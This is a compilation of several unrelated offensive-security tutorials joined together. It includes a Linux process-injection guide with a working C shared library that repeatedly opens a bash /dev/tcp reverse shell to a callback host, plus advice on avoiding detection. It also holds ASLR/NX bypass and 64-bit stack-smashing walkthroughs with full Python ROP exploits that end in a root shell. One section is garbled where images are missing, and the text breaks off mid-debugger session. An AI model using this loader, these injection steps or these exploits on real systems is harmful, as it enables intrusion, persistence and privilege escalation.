Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new proceses.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
  PID USER     COMMAND
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.

Malware

More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached */
        if (-1 == pthread_attr_init(&attr)) {
                return;
        }
        if (-1 == pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {
                return;
        }

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);
}

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
{
        for (;;) {
                /* Try to spawn a reverse shell */
                system(CMD);
                /* Wait until next shell */
                sleep(SLEEP);
        }
        return NULL;
}

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.

Injection

Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like /usr/lib. We’ll use 2 for the flags, which corresponds to dlopen(3)’s RTLD_NOW. To get GDB to cause the process to run the function, we’ll use GDB’s print command, which conviently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a quitcommand.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
...snip...
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

[stuart@c2server:/home/stuart]
$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
...snip...
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args
...snip...

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen $1 = 0, indicating__libc_dlopen_mode returned NULL.

Artifacts

There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library doule-fork a child process to do the actual work or having the injected library do everything from within the victim process.

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
...snip...
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            
...snip...

If we delete the library, (deleted) is appended to the filename (i.e./root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into systemd(1), it causes segfaults and makes shutdown(8) hang the box).

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

 

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

 

 

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

 

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

 

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.

Setup

The setup is identical to what I was using in part 1. We’ll also be making use of the following:

Ret2Libc

Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
.
.
.
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"
Gadgets
=======


0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
.
.
.
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
.
.
.
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
.
.
.
[-------------------------------------code-------------------------------------]
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
